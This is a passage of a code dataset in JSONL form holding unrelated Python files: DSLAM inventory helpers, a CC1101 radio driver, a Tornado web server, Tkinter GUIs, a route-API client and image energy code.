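        return 'Draw'
    return 'You Own!' if beats.get(user) == computer else 'You Lost!'

# outcome('r', 's') -> 'You Own!'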
\\n')\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n play_game()\r\n","sub_path":"Minor Projects/sicossrs paper rock.py","file_name":"sicossrs paper rock.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"174723581","text":"import csv\r\nimport os\r\n\r\ndef store_output(total_output, TIEMPO, dir_output):\r\n \"\"\"\r\n Guarda un string en Output/archivo.txt marcado segun del día\r\n\r\n total_output: Stirng con lo que se quiere agregar al archivo\r\n\r\n TIEMPO: Date del momento en que se ejecutó el script\r\n\r\n dir_output: \r\n \"\"\"\r\n if not (os.path.isdir(dir_output)):\r\n os.mkdir(dir_output)\r\n f = open(dir_output + \"/output_{0}.txt\".format(TIEMPO),\"a+\")\r\n for o in total_output:\r\n if isinstance(o,int):\r\n continue\r\n try:\r\n f.write(o)\r\n except:\r\n print(\"Error while writing line: \"+ str(o))\r\n f.close()\r\n\r\ndef crear_lista_DSLAMs(DSLAM_dir,test = False,manual = False):\r\n if test:\r\n Lista_DSLAMs = [{\"DSLAM_Modelo\": \"ISAM-FD\", \"DSLAM_Nombre\": \"MAQUETA\", \"DSLAM_IP\": \"192.168.121.33\"}]\r\n return Lista_DSLAMs\r\n elif manual:\r\n Lista_DSLAMs = [{\"DSLAM_Modelo\": \"ISAM-FD\",\"DSLAM_IP\":input(\"Ingresar IP de DSLAM:\")}]\r\n Lista_DSLAMs[0][\"DSLAM_Nombre\"]=Lista_DSLAMs[0][\"DSLAM_IP\"]\r\n return Lista_DSLAMs\r\n else:\r\n archivos = os.listdir(DSLAM_dir)\r\n if \"dslam.csv\" in archivos:\r\n dir = DSLAM_dir + \"/dslam.csv\"\r\n with open(dir, newline='') as csvfile:\r\n Lista_DSLAM = []\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n newrow = row[0].split(\",\")\r\n dict = {\"DSLAM_Modelo\":newrow[0],\"DSLAM_Nombre\":newrow[1],\"DSLAM_IP\":newrow[2]}\r\n Lista_DSLAM.append(dict)\r\n Lista_DSLAM.pop(0)\r\n return Lista_DSLAM\r\n\r\ndef crear_lista_Servicios(dir_inv, dslam, test=False, manual=False):\r\n if test:\r\n Lista_Servicios = [{\"port\":\"1/1/1/1\",\"DSLAM_Modelo\":\"ISAM-FD\", \"service\":\"PRUEBA\"}]\r\n return Lista_Servicios\r\n elif manual:\r\n Lista_Servicios = [{\"port\":input(\"Ingresar Puerto:\"),\"DSLAM_Modelo\":\"ISAM-FD\"}]\r\n Lista_Servicios[0][\"service\"] = Lista_Servicios[0][\"port\"]\r\n return Lista_Servicios\r\n else:\r\n archivos = os.listdir(dir_inv)\r\n if (dslam[\"DSLAM_Nombre\"]+\".csv\") in archivos:\r\n dir_servicios = dir_inv + \"/\" + dslam[\"DSLAM_Nombre\"]+\".csv\"\r\n with open(dir_servicios, newline='') as csvfile:\r\n Lista_Servicios = []\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n newrow = row[0].split(\",\")\r\n #DSLAM_Nombre,DSLAM_IP,port,type,user,service,admin-status\r\n dict = {\"DSLAM_Nombre\":newrow[0],\"DSLAM_IP\":newrow[1],\"port\":newrow[2],\"type\":newrow[3],\"user\":newrow[3],\"service\":newrow[4],\"admin-status\":newrow[5]}\r\n Lista_Servicios.append(dict)\r\n Lista_Servicios.pop(0)\r\n return Lista_Servicios\r\n\r\ndef Dict_to_CSV_DSLAM(Dict,name, TIEMPO,csv_columns):\r\n if not (os.path.isdir('Inventory/'+ TIEMPO)):\r\n os.mkdir(\"Inventory/\"+ TIEMPO)\r\n csv_file = \"Inventory/{0}/{1}.csv\".format(TIEMPO,name)\r\n try:\r\n with open(csv_file, 'w') as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\r\n writer.writeheader()\r\n for data in Dict:\r\n writer.writerow(data)\r\n except :\r\n print(\"I/O error\")\r\n return 3 #ERROR_READWRITE\r\n return 0 #OK\r\n\r\n#FUNCION delta_inventory\r\n#Objetivo:\r\n# Leer los titulos de 
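# --- Added note on the CSV reading above: opening with delimiter=' ' and
# then splitting row[0] on ',' by hand can be avoided by letting csv parse
# the commas itself. A self-contained demo with a made-up two-line file:
import csv, io

sample = "DSLAM_Modelo,DSLAM_Nombre,DSLAM_IP\nISAM-FD,MAQUETA,192.168.121.33\n"
for row in csv.DictReader(io.StringIO(sample)):   # delimiter=',' is the default
    print(row['DSLAM_IP'])                        # 192.168.121.33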
#FUNCTION delta_inventory\r\n#Goal:\r\n#   Read the names of every .csv file in a folder tree and keep them in a list\r\n#   Compare that list against the full list of DSLAMs\r\n#Pseudo-code\r\n#\r\n#   Lista_Inventory = read_files_in_folder(folder)\r\n#   Lista_total_DSLAMs = crear_lista_DSLAMs(DSLAM_dir)\r\n#\r\n#   Lista_de_diferencia = [ i for i in Lista_total_DSLAMs if i not in Lista_Inventory]\r\n#\r\n#   crear_csv(Lista_de_diferencia)\r\n\r\ndef delta_inventory(dir_inv, Lista_DSLAMs):\r\n    if not os.path.isdir('Inventory'):\r\n        os.mkdir(\"Inventory\")\r\n        return []\r\n    Carpetas_Inventory = os.listdir(dir_inv)\r\n\r\n    Lista_Revisados = []\r\n    for carpeta in Carpetas_Inventory:  # the original reused 'i' for both loops and shadowed the builtin 'list'\r\n        archivos = os.listdir(dir_inv + \"/\" + carpeta)\r\n        Inventory = []\r\n        for archivo in archivos:\r\n            Inventory.append(archivo[:-4])  # strip the \".csv\" extension\r\n        Lista_Revisados.extend(Inventory)\r\n\r\n    Lista_delta = [ i for i in Lista_DSLAMs if i[\"DSLAM_Nombre\"] not in Lista_Revisados]\r\n    return Lista_delta\r\n\r\n#Lista_DSLAMs = crear_lista_DSLAMs(\"dslam\")\r\n#print(Lista_DSLAMs)\r\n","sub_path":"Tools/output_file.py","file_name":"output_file.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
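Editor's note: a minimal worked example of the delta that delta_inventory computes -- the DSLAMs whose name has no matching .csv anywhere under the Inventory tree. The data below is made up for illustration:

dslams = [{"DSLAM_Nombre": "NODO-A"}, {"DSLAM_Nombre": "NODO-B"}]
revisados = ["NODO-A"]  # names recovered from existing .csv files
delta = [d for d in dslams if d["DSLAM_Nombre"] not in revisados]
assert delta == [{"DSLAM_Nombre": "NODO-B"}]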
+{"seq_id":"46217581","text":"import logging\nimport multiprocessing as mp\nimport unittest\nfrom typing import Any, Dict, Generic, List, Mapping, TypeVar\n\nfrom .expector_protocol import ExpectorProtocol\n\nT = TypeVar('T')\n\n\nclass MPExpector(ExpectorProtocol, Generic[T]):\n\n    def __init__(self,\n                 expectations: Mapping[T, int],\n                 testcase: unittest.TestCase\n                 ) -> None:\n        manager = mp.Manager()\n        self.expectations = expectations\n        self.testcase = testcase\n        self.log = logging.getLogger()\n        self.times_called: Dict[str, int] = manager.dict()\n        for key in expectations:\n            self.times_called[str(key)] = 0\n\n    def get_expectations(self) -> List[T]:\n        return list(self.expectations.keys())\n\n    def call(self, key: Any) -> None:\n        val = self.times_called.get(str(key))\n        if val is None:\n            val = 0\n        self.times_called[str(key)] = val + 1\n\n    def assert_satisfied(self) -> None:\n        '''Assert that all expectations have been satisfied\n        '''\n        for (key, expected_value) in self.expectations.items():\n            if expected_value != self.times_called[str(key)]:\n                self.dump()\n            self.testcase.assertEqual(expected_value,\n                                      self.times_called[str(key)],\n                                      \"For \" + str(key))\n        self.testcase.assertTrue(True)\n\n    def check(self) -> bool:\n        '''Check each expectation and short-circuit if one is not satisfied.\n        '''\n        for (key, expected_value) in self.expectations.items():\n            if expected_value != self.times_called[str(key)]:\n                return False\n        return True\n\n    def dump(self) -> None:\n        self.log.debug(self.times_called)\n\n    def __enter__(self) -> \"MPExpector[T]\":\n        return self\n","sub_path":"snr/utils/mp_expector.py","file_name":"mp_expector.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
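Editor's note: MPExpector above keys a multiprocessing Manager dict by str(key) so counts are visible across processes. A hedged, standalone sketch of that pattern -- the names bump and counts are illustrative only; note that, like the original, the read-modify-write is not atomic, so concurrent increments can be lost:

import multiprocessing as mp

def bump(shared, key):
    shared[str(key)] = shared.get(str(key), 0) + 1

if __name__ == '__main__':
    manager = mp.Manager()
    counts = manager.dict()
    workers = [mp.Process(target=bump, args=(counts, 'ping')) for _ in range(3)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    print(dict(counts))  # {'ping': 3} barring lost updates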
+{"seq_id":"36714531","text":"import RPi.GPIO as GPIO\nimport spidev\nfrom time import sleep\n\nclass TransmitReceive():\n    def __init__(self):\n        self.initVar()\n        self.initSPI()\n        self.initGDO()\n        self.reset()\n        self.initReg()\n        self.write(self.PATABLE, self.PATABELVAL)\n    \n    def initVar(self):\n        #CC1101 CONFIG REGISTERS\n        self.IOCFG2 = 0x00    # GDO2 output pin configuration\n        self.IOCFG1 = 0x01    # GDO1 output pin configuration\n        self.IOCFG0 = 0x02    # GDO0 output pin configuration\n        self.FIFOTHR = 0x03   # RX FIFO and TX FIFO thresholds\n        self.SYNC1 = 0x04     # Sync word, high INT8U\n        self.SYNC0 = 0x05     # Sync word, low INT8U\n        self.PKTLEN = 0x06    # Packet length\n        self.PKTCTRL1 = 0x07  # Packet automation control\n        self.PKTCTRL0 = 0x08  # Packet automation control\n        self.ADDR = 0x09      # Device address\n        self.CHANNR = 0x0A    # Channel number\n        self.FSCTRL1 = 0x0B   # Frequency synthesizer control\n        self.FSCTRL0 = 0x0C   # Frequency synthesizer control\n        self.FREQ2 = 0x0D     # Frequency control word, high INT8U\n        self.FREQ1 = 0x0E     # Frequency control word, middle INT8U\n        self.FREQ0 = 0x0F     # Frequency control word, low INT8U\n        self.MDMCFG4 = 0x10   # Modem configuration\n        self.MDMCFG3 = 0x11   # Modem configuration\n        self.MDMCFG2 = 0x12   # Modem configuration\n        self.MDMCFG1 = 0x13   # Modem configuration\n        self.MDMCFG0 = 0x14   # Modem configuration\n        self.DEVIATN = 0x15   # Modem deviation setting\n        self.MCSM2 = 0x16     # Main Radio Control State Machine configuration\n        self.MCSM1 = 0x17     # Main Radio Control State Machine configuration\n        self.MCSM0 = 0x18     # Main Radio Control State Machine configuration\n        self.FOCCFG = 0x19    # Frequency Offset Compensation configuration\n        self.BSCFG = 0x1A     # Bit Synchronization configuration\n        self.AGCCTRL2 = 0x1B  # AGC control\n        self.AGCCTRL1 = 0x1C  # AGC control\n        self.AGCCTRL0 = 0x1D  # AGC control\n        self.WOREVT1 = 0x1E   # High INT8U Event 0 timeout\n        self.WOREVT0 = 0x1F   # Low INT8U Event 0 timeout\n        self.WORCTRL = 0x20   # Wake On Radio control\n        self.FREND1 = 0x21    # Front end RX configuration\n        self.FREND0 = 0x22    # Front end TX configuration\n        self.FSCAL3 = 0x23    # Frequency synthesizer calibration\n        self.FSCAL2 = 0x24    # Frequency synthesizer calibration\n        self.FSCAL1 = 0x25    # Frequency synthesizer calibration\n        self.FSCAL0 = 0x26    # Frequency synthesizer calibration\n        self.RCCTRL1 = 0x27   # RC oscillator configuration\n        self.RCCTRL0 = 0x28   # RC oscillator configuration\n        self.FSTEST = 0x29    # Frequency synthesizer calibration control\n        self.PTEST = 0x2A     # Production test\n        self.AGCTEST = 0x2B   # AGC test\n        self.TEST2 = 0x2C     # Various test settings\n        self.TEST1 = 0x2D     # Various test settings\n        self.TEST0 = 0x2E     # Various test settings\n        \n        #CC1101 STROBE COMMANDS\n        self.SRES = 0x30      # Reset chip.\n        self.SFSTXON = 0x31   # Enable and calibrate frequency synthesizer (if MCSM0.FS_AUTOCAL=1).\n                              # If in RX/TX: Go to a wait state where only the synthesizer is\n                              # running (for quick RX / TX turnaround).\n        self.SXOFF = 0x32     # Turn off crystal oscillator.\n        self.SCAL = 0x33      # Calibrate frequency synthesizer and turn it off\n                              # (enables quick start).\n        self.SRX = 0x34       # Enable RX. Perform calibration first if coming from IDLE and\n                              # MCSM0.FS_AUTOCAL=1.\n        self.STX = 0x35       # In IDLE state: Enable TX. Perform calibration first if\n                              # MCSM0.FS_AUTOCAL=1. If in RX state and CCA is enabled:\n                              # Only go to TX if channel is clear.\n        self.SIDLE = 0x36     # Exit RX / TX, turn off frequency synthesizer and exit\n                              # Wake-On-Radio mode if applicable.\n        self.SAFC = 0x37      # Perform AFC adjustment of the frequency synthesizer\n        self.SWOR = 0x38      # Start automatic RX polling sequence (Wake-on-Radio)\n        self.SPWD = 0x39      # Enter power down mode when CSn goes high.\n        self.SFRX = 0x3A      # Flush the RX FIFO buffer.\n        self.SFTX = 0x3B      # Flush the TX FIFO buffer.\n        self.SWORRST = 0x3C   # Reset real time clock.\n        self.SNOP = 0x3D      # No operation. May be used to pad strobe commands to two\n                              # INT8Us for simpler software.\n        \n        #CC1101 STATUS REGISTERS\n        self.PARTNUM = 0x30\n        self.VERSION = 0x31\n        self.FREQEST = 0x32\n        self.LQI = 0x33\n        self.RSSI = 0x34\n        self.MARCSTATE = 0x35\n        self.WORTIME1 = 0x36\n        self.WORTIME0 = 0x37\n        self.PKTSTATUS = 0x38\n        self.VCO_VC_DAC = 0x39\n        self.TXBYTES = 0x3A\n        self.RXBYTES = 0x3B\n\n        #CC1101 PATABLE,TXFIFO,RXFIFO\n        self.PATABLE = 0x3E\n        self.TXFIFO = 0x3F\n        self.RXFIFO = 0x3F\n        \n        #bit constants\n        self.WRITE_BURST = 0x40     #write burst\n        self.READ_SINGLE = 0x80     #read single\n        self.READ_BURST = 0xC0      #read burst\n        self.BYTES_IN_RXFIFO = 0x7F #byte number in RXfifo\n        \n        #pin settings\n        self.GDO0 = 23\n        self.GDO2 = 24\n        \n        #Patable\n        self.PATABELVAL = [0xC0, 0xC0, 0xC0, 0xC0, 0xC0, 0xC0, 0xC0, 0xC0]\n    \n    def initSPI(self):\n        self.spi = spidev.SpiDev()\n        self.spi.open(0,0)\n        self.spi.cshigh = False\n    \n    def initGDO(self):\n        GPIO.setmode(GPIO.BCM)\n        GPIO.setup(self.GDO0, GPIO.IN)\n        GPIO.setup(self.GDO2, GPIO.IN)\n    \n    def reset(self):\n        self.write(self.SRES)\n    \n    def initReg(self):\n        self.write(self.FSCTRL1, 0x08)\n        self.write(self.FSCTRL0, 0x00)\n        self.write(self.FREQ2, 0x10)\n        self.write(self.FREQ1, 0xA7)\n        self.write(self.FREQ0, 0x62)\n        self.write(self.MDMCFG4, 0x5B)\n        self.write(self.MDMCFG3, 0xF8)\n        self.write(self.MDMCFG2, 0x03)\n        self.write(self.MDMCFG1, 0x22)\n        self.write(self.MDMCFG0, 0xF8)\n        self.write(self.CHANNR, 0x00)\n        self.write(self.DEVIATN, 0x47)\n        self.write(self.FREND1, 0xB6)\n        self.write(self.FREND0, 0x10)\n        self.write(self.MCSM0, 0x18)\n        self.write(self.FOCCFG, 0x1D)\n        self.write(self.BSCFG, 0x1C)\n        self.write(self.AGCCTRL2, 0xC7)\n        self.write(self.AGCCTRL1, 0x00)\n        self.write(self.AGCCTRL0, 0xB2)\n        self.write(self.FSCAL3, 0xEA)\n        self.write(self.FSCAL2, 0x2A)\n        self.write(self.FSCAL1, 0x00)\n        self.write(self.FSCAL0, 0x11)\n        self.write(self.FSTEST, 0x59)\n        self.write(self.TEST2, 0x81)\n        self.write(self.TEST1, 0x35)\n        self.write(self.TEST0, 0x09)\n        self.write(self.IOCFG2, 0x0B)   #serial clock, synchronous to the data in synchronous serial mode\n        self.write(self.IOCFG0, 0x06)   #asserts when sync word has been sent/received, and de-asserts at the end of the packet\n        self.write(self.PKTCTRL1, 0x04) #two status bytes will be appended to the payload of the packet, including RSSI, LQI and CRC OK\n                                        #No address check\n        self.write(self.PKTCTRL0, 0x05) #whitening off, CRC enable, variable length packets: packet length configured by the first byte after sync word\n        self.write(self.ADDR, 0x00)     #address used for packet filtration.\n        self.write(self.PKTLEN, 0x3D)   #61 bytes max length\n    \n    def sendData(self, data):\n        #data must be a list\n        self.write(self.TXFIFO, len(data))\n        data.append(len(data))\n        self.write(self.TXFIFO, data)\n        self.write(self.STX)\n        while self.read(self.PKTSTATUS) & 0x01 == 0:\n            pass\n        while self.read(self.PKTSTATUS) & 0x01 == 1:\n            pass\n        self.write(self.SFTX)\n    \n    def write(self, addr, val=None):\n        if val is not None:  # 0x00 is a valid register value; the original 'if val:' silently dropped it\n            data = [addr | self.WRITE_BURST]\n            if isinstance(val, int):\n                val = [val]\n            elif not isinstance(val, list):\n                raise TypeError(\"Value must be List or Integer\")\n            data.extend(val)\n        else:\n            data = [addr]\n        \n        self.spi.writebytes(data)\n    \n    def read(self, addr, num=1):\n        if num == 1:\n            data = [addr | self.READ_SINGLE]\n        else:\n            data = [addr | self.READ_BURST]\n        \n        data.extend([0] * num)\n        \n        if num == 1:\n            return self.spi.xfer2(data)[1]\n        else:\n            return 
self.spi.xfer2(data)[1:]\n","sub_path":"transmitReceive.py","file_name":"transmitReceive.py","file_ext":"py","file_size_in_byte":9442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626265340","text":"# -*- coding: utf-8 -*-\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport random\nimport math\nimport os\nimport os.path\nimport data\nimport re\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nfrom tornado.options import define, options\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\n\n\nclass ErrorHandler(tornado.web.RequestHandler):\n '''handler for error page'''\n def get(self):\n self.write_error(404)\n\n def write_error(self, status_code, **kwargs):\n if status_code == 404:\n self.render('404.html')\n else:\n self.write('error:' + str(status_code))\n\n\nclass BookPartHandler(tornado.web.RequestHandler):\n def get(self, name):\n book = data.getbook(name)\n self.render('book-part.html', book=book, back_url='/book')\n\n\nclass BookHandler(tornado.web.RequestHandler):\n def get(self):\n all_img = data.getimages('book', 'books')\n book_img = all_img[:4]\n key = ['url', 'img', 'alt']\n books = []\n for x in range(4):\n books.append(dict(zip(key, ['/book/book'+str(x), book_img[x], str(x)])))\n self.render('book.html', books=books, back_url='/')\n\n\nclass SomaHandler(tornado.web.RequestHandler):\n def get(self):\n all_img = data.getimages('funnycat', 'funnycats')\n col = row = 2\n funnycats = []\n for x in range(col):\n funnycat = []\n for y in range(row):\n funnycat.append(all_img[random.randrange(0, 16)])\n funnycats.append(funnycat)\n bodyareas = data.getbodyareas()\n self.render('soma.html', funnycats=funnycats, bodyareas=bodyareas, back_url='/')\n\n\nclass SomaPartHandler(tornado.web.RequestHandler):\n def get(self, name):\n key = ['funnycat', 'title', 'details']\n val = []\n all_img = data.getimages('funnycat', 'funnycats')\n val.append(all_img[random.randrange(0, 16)])\n all_img = data.getimages('text-'+name, 'body')\n if len(all_img) < 1:\n self.redirect('/error')\n val.append(all_img[0])\n all_img = data.getimages('body-'+name, 'body')\n val.append(all_img)\n soma_part = dict(zip(key, val))\n self.render('soma-part.html', soma_part=soma_part, back_url='/soma')\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n #hotcats = data.gethotcats()\n self.render('index.html')\n\n\n\nif __name__ == \"__main__\":\n tornado.options.parse_command_line()\n settings = {\n \"debug\": True,\n \"template_path\": os.path.join(os.path.dirname(__file__), \"template\"),\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\")\n }\n app = tornado.web.Application(\n handlers=[\n (r\"/\", IndexHandler), (r\"/soma\", SomaHandler),\n (r\"/soma/(\\w+)\", SomaPartHandler), (r'/book', BookHandler),\n (r\"/book/(\\w+)\", BookPartHandler), (r'.*', ErrorHandler)],\n **settings\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"392623966","text":"import Tkinter\nimport media\nfrom PIL import ImageTk\n\n# Normally, this function would be in another module; that's how your project\n# should be structured.\ndef halve_red(pic):\n '''Cut the red values in half for every 
pixel in pic.'''\n    \n    for p in pic:\n        p.set_red(p.get_red() / 2)\n\n\n# Image manipulation wrapper functions. Create one for each effect that you\n# implement.\n\ndef halve_red_wrapper(label):\n    '''Halve the red values of the pixels in label's picture and update the\n    GUI.'''\n\n    halve_red(label.picture)\n    update_label(label)\n\n\n# Utility functions. Use these to change the picture being displayed.\n\ndef update_label(label):\n    '''Update Label label to re-display its picture. This needs to be called\n    any time label's image is changed.'''\n    \n    photo = ImageTk.PhotoImage(label.picture.get_image())\n    label.config(image=photo)\n    label.config(width=photo.width())\n    label.config(height=photo.height())\n\n    # Keep a reference to the PhotoImage to avoid garbage collection.\n    label.image = photo\n\n\ndef open_pic(label):\n    '''Prompt for a Picture file, load that picture, and display it in Label\n    label.'''\n    \n    # Keep a reference to the picture so it can be modified.\n    label.picture = media.load_picture(media.choose_file())\n    update_label(label)\n\n\nif __name__ == \"__main__\":\n    # Here is an example of placing an image in a label and manipulating it.\n    \n    window = Tkinter.Toplevel()\n    frame = Tkinter.Frame(window)\n    frame.pack()\n\n    # Add a label to display the picture\n    label = Tkinter.Label(frame, width=10, height=10)\n    label.pack()\n\n    change_pic_cmd = lambda: open_pic(label)\n    open_button = Tkinter.Button(frame, text='Open Picture',\n                                 command=change_pic_cmd)\n    open_button.pack()\n\n    halve_red_cmd = lambda: halve_red_wrapper(label)\n    red_btn = Tkinter.Button(frame, text='Halve Red',\n                             command=halve_red_cmd)\n    red_btn.pack()\n    \n    window.mainloop()\n","sub_path":"ImageProcessing/label_image.py","file_name":"label_image.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341214057","text":"import requests\n\nfrom platforms.platform import Platform\n\n\nclass Walking(Platform):\n    original_data = None\n\n    def __init__(self, amap):\n        super().__init__(amap)\n\n    def format(self, details=False):\n        return [{\n            'way': self.__class__.__name__,\n            'number': 1,\n            'duration': int(self.original_data['route']['paths'][0]['duration']),\n            'distance': int(self.original_data['route']['paths'][0]['distance']),\n            'walking_distance': int(self.original_data['route']['paths'][0]['distance']),\n            'cost': 0,\n            'steps': self.original_data['route']['paths'][0]['steps'] if details is True else [],\n            'extra': '',\n        }]\n\n    def request_original_data(self):\n        url = self.amap.domain + '/v3/direction/walking?parameters'\n        params = {\n            'key': self.amap.key,\n            'origin': self.amap.origin,\n            'destination': self.amap.destination,\n            # 'sig': '',\n            'output': 'JSON',\n        }\n        response = requests.get(url, params=params)\n        return response.json()\n\n    @staticmethod\n    def get_polyline_from_steps(steps):\n        points = []\n        [points.extend(step['polyline'].split(';')) for step in steps]\n        return {'walking': [[float(point.split(',')[0]), float(point.split(',')[1])] for point in points]}\n\n\n","sub_path":"platforms/walking.py","file_name":"walking.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
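Editor's note: get_polyline_from_steps above flattens AMap "x,y;x,y" polyline strings into coordinate pairs. A small, hedged round-trip sketch of that parsing -- the sample data is made up:

steps = [{'polyline': '116.1,39.9;116.2,40.0'}, {'polyline': '116.3,40.1'}]
points = []
for step in steps:
    points.extend(step['polyline'].split(';'))
coords = [[float(p.split(',')[0]), float(p.split(',')[1])] for p in points]
assert coords == [[116.1, 39.9], [116.2, 40.0], [116.3, 40.1]]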
 +{"seq_id":"109164285","text":"from PIL import Image\n\ndef energy(pxls,x,y):\n\te = 0\n\ttry:\n\t\t# dual-gradient energy: squared RGB differences of the x and y neighbours\n\t\tdx = (pow(abs(pxls[(x-1),y][0] - pxls[(x+1),y][0]),2) + pow(abs(pxls[(x-1),y][1] - pxls[(x+1),y][1]),2) + pow(abs(pxls[(x-1),y][2] - pxls[(x+1),y][2]),2))\n\t\tdy = (pow(abs(pxls[x,(y+1)][0] - pxls[x,(y-1)][0]),2) + pow(abs(pxls[x,(y+1)][1] - pxls[x,(y-1)][1]),2) + pow(abs(pxls[x,(y+1)][2] - pxls[x,(y-1)][2]),2))\n\t\te = dx + dy\n\texcept Exception:\n\t\tpass  # border pixels keep energy 0\n\treturn e\n\ndef getImage(filename):\n\timg = Image.open(filename)\n\treturn img\n\ndef getPixels(img):\n\tpxls = img.load()\n\treturn pxls\n\ndef saveEnergy(width,height,pxls):\n\twhole = []\n\trow = []\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\ten = energy(pxls,x,y)\n\t\t\trow.append(en)\n\t\t\tif(y == (height - 1)):\n\t\t\t\twhole.append(row)\n\t\t\t\trow = []\n\treturn whole\n\ndef main():\n\tprint(\"Starting Program...\")\n\timg = getImage(\"images/lake.jpg\")\n\tpxls = getPixels(img)\n\twidth, height = img.size\n\teMap = saveEnergy(width,height,pxls)\n\tprint(eMap)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"46703245","text":"#!/usr/bin/python\nfrom math import sqrt as sroot\nfrom fractions import Fraction\nfrom random import randint\nimport tkinter\nclass calc(tkinter.Tk):\n    def __init__(self,parent):\n        tkinter.Tk.__init__(self,parent)\n        self.parent = parent\n        self.initialize()\n\n    def initialize(self):\n        self.grid()\n        self.a = tkinter.Entry(self)\n        self.b = tkinter.Entry(self)\n        self.c = tkinter.Entry(self)\n        self.a.grid(columnspan=1, column=0, row=0)\n        self.b.grid(columnspan=1, column=1, row=0)\n        self.c.grid(columnspan=1, column=2, row=0)\n        # the original event names were lost in extraction; <Return> is assumed here\n        self.a.bind(\"<Return>\", self.dothis)\n        self.b.bind(\"<Return>\", self.dothis)\n        self.c.bind(\"<Return>\", self.dothis)\n        self.x1 = tkinter.StringVar()\n        self.x2 = tkinter.StringVar()\n        self.maxmin = tkinter.StringVar()\n        self.maxmin_lab = tkinter.StringVar()\n        x1_label = tkinter.Label(self, textvariable=self.x1, anchor=\"w\")\n        x2_label = tkinter.Label(self, textvariable=self.x2, anchor='w')\n        maxmin_label = tkinter.Label(self, textvariable=self.maxmin_lab, anchor='w')\n        maxmincoord = tkinter.Label(self, textvariable=self.maxmin, anchor=\"w\")\n        maxmin_label.grid(column=0, row=3)\n        maxmincoord.grid(column=2, row=3)\n        \n        x1_label.grid(row=2, column=0)\n        x2_label.grid(row=2, column=1)\n    \n    def f(self, x, a, b, c):\n        return a*x**2+b*x+c\n\n    def get_max_min(self, a, b, c):\n        h = float((-1*b)/(2*a))\n        k = self.f(h, a, b, c)\n        if a < 0:\n            self.maxmin_lab.set(\"Maximum\")  # parabola opens downward, so the vertex is a maximum (the original had the labels swapped)\n        else:\n            self.maxmin_lab.set(\"Minimum\")\n        self.maxmin.set(\"(\"+str(h)+\",\"+str(k)+\")\")\n\n\n    def get_x_int(self, i, a, b, c):\n        try:\n            rooty = sroot(((b**2)-4*a*c))\n        except ValueError:\n            # negative discriminant: fall back to the magnitude (the roots are actually complex)\n            rooty = sroot(-1*((b**2)-4*a*c))\n        root1 = (-b + rooty)/(2*a)\n        root2 = (-b - rooty)/(2*a)\n        if i == 1:\n            return root1\n        elif i == 0:\n            return root2\n        else:\n            return None  # unreachable for i in {0, 1}\n    def dothis(self, event):\n        a = float(self.a.get())\n        b = float(self.b.get())\n        c = float(self.c.get())\n        xint = [str(Fraction((self.get_x_int(1, a, b, c)))), str(Fraction((self.get_x_int(0, a, b, c))))]\n        self.x1.set(xint[0])\n        self.x2.set(xint[1])\n        self.get_max_min(a, b, c)\nif __name__ == \"__main__\":\n    app = calc(None)\n    app.title(\"calc\")\n    app.mainloop()\n","sub_path":"quadgui.py","file_name":"quadgui.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315336848","text":"from __future__ import print_function\nimport torch\nfrom torchvision import transforms\nimport argparse\nimport cv2\nimport sys\nimport numpy as np\nimport matplotlib as 
mpl\nmpl.rcParams['figure.dpi']= 150\nfrom matplotlib import pyplot as plt\nfrom util import define_model\nfrom prepare_data import split_data\nfrom test import test_rg\n\nif __name__ == \"__main__\":\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n device_list = [device]\n\n parser = argparse.ArgumentParser(description=\"Parser for ros label prediction\")\n parser.add_argument('--phase', type=str, default='train', help='train, test, etc')\n parser.add_argument('--dict_files', nargs='+', help='list of files for testing')\n\n #data_related options\n parser.add_argument(\"--dataset_path\", type=str, help=\"path to the training dataset\")\n parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument(\"--phase_norm\", type=str, default ='min_max', help=\"normalization on the phase data [min_max| self_min_max]\")\n parser.add_argument(\"--ros_norm\", type=str, default ='None', help=\"normalization on the phase data [min_max| self_min_max]\")\n parser.add_argument(\"--std_transform\", type=bool, default =False, help=\"whether perform std mean norm on the phase data\")\n \n\n # training options \n # parser.add_argument(\"--epochs\", type=int, default=200, help=\"Number of training epochs\")\n parser.add_argument(\"--batch_size\", type=int, default=16, help=\"Batch size for training\")\n parser.add_argument(\"--checkpoint_model\", type=str, help=\" path to checkpoint model\")\n 